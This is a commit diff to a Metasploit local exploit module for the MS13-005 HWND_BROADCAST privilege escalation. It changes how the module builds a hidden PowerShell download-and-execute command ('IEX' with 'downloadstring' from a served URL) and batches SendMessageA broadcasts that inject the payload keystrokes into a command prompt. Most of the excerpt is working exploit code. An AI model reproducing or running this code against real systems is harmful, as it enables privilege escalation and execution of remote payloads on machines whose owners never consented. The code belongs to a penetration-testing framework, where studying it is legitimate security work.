Land #2468 - Hwnd Broadcast Performance

modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb

@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Local
       if datastore['CUSTOM_COMMAND']
         command = datastore['CUSTOM_COMMAND']
       else
-        print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the psh payload")
+        print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the powershell command line payload")
         command = cmd_psh_payload(payload.encoded)
       end
       make_it(command)
@@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Local
   def primer
     url = get_uri()
     download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-    command = "powershell.exe -w hidden -nop -ep bypass -c #{download_and_run}"
+    command = "powershell.exe -w hidden -nop -c #{download_and_run}"
     make_it(command)
   end
 
@@ -210,13 +210,14 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
+    multi_rail = []
     command.each_char do |c|
-      print c if command.length < 200
+      multi_rail << ['user32', 'SendMessageA', ['HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0]]
-      client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
     end
-    print_line
+
+    multi_rail << ['user32', 'SendMessageA', ['HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0]]
     print_status("Executing command...")
-    client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)
+    client.railgun.multi(multi_rail)
   end
 
   def on_request_uri(cli, request)